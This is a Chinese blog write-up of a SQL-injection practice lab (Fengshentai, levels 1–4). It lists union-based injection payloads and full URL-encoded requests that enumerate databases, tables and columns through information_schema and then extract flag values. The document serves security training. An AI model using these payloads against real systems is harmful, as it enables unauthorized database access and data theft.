封神台——训练营0基础学渗透测试

SQL注入实战靶场

SQL注入实战靶场——基础靶场1

1. 判断是否存在SQL注入:and 1=2 
2. 判断字段数:order by 3 
3. 判断回显点:and 1=2 union select 1,2,3
4. 查询数据库:and 1=2 union select 1,database(),3

在这里插入图片描述

5.查询表名:and 1=2 union select 1,table_name,3 from information_schema.tables where table_schema='error' 
6.查询列名:and 1=2 union select 1,column_name,3 from information_schema.columns where table_name='error_flag' limit 1,1 
7. 查询具体数据:and 1=2 union select 1,2,flag from error_flag limit 0,1

一次性查询所有表名:and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='error'
一次性查询所有列名:and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='error_flag' 
一次性查询所有字段:and 1=2 union select 1,2,group_concat(id,flag) from error_flag

这里是引用
在这里插入图片描述

SQL注入实战靶场——基础靶场2

  1. 判断是否存在注入:'and 1=1 – d
    http://injectx1.lab.aqlab.cn:81/Pass-02/index.php?id=1%20%27and%201=1%20--%20d
  2. 判断字段数:'order by 3 – d
    http://injectx1.lab.aqlab.cn:81/Pass-02/index.php?id=1%27order%20by%203%20--%20d
  3. 判断回显点:'and 1=2 union select 1,2,3 – d
    http://injectx1.lab.aqlab.cn:81/Pass-02/index.php?id=1%27and%201=2%20union%20select%201,2,3%20--%20d
  4. 查询数据库:'and 1=2 union select 1,database(),3 – d
    http://injectx1.lab.aqlab.cn:81/Pass-02/index.php?id=1%27and%201=2%20union%20select%201,database(),3%20--%20d
  5. 查询表名:union select 1,table_name,3 from information_schema.tables where table_schema=‘error’ – d
    http://injectx1.lab.aqlab.cn:81/Pass-02/index.php?id= 1 %20%27and%201=2%20union%20select%201,table_name,3%20from%20information_schema.tables%20where%20table_schema=%27error%27%20--%20d
  6. 查询列名:'and 1=2 union select 1,column_name,3 from information_schema.columns where table_name=‘error_flag’ limit 0,1 – d
    http://injectx1.lab.aqlab.cn:81/Pass-02/index.php?id=1%27and%201=2%20union%20select%201,column_name,3%20from%20information_schema.columns%20where%20table_name=%27error_flag%27%20limit%200,1%20--%20d
    7.查询具体数据:'and 1=2 union select 1,2,flag from error_flag limit 1,1 – d
    http://injectx1.lab.aqlab.cn:81/Pass-02/index.php?id=1%27and%201=2%20union%20select%201,2,flag%20from%20error_flag%20limit%201,1%20--%20d

SQL注入实战靶场——基础靶场3

前面闭合,后面注释掉,方法同上

') and 1=2 union select 1,flag,2 from error_flag limit 2,1 -- q

SQL注入实战靶场——基础靶场4

") and 1=2 union select 1,flag,2 from error_flag limit 3,1 -- d

在这里插入图片描述

posted @ 2022-10-12 21:30  sparename  阅读(31)  评论(0)    收藏  举报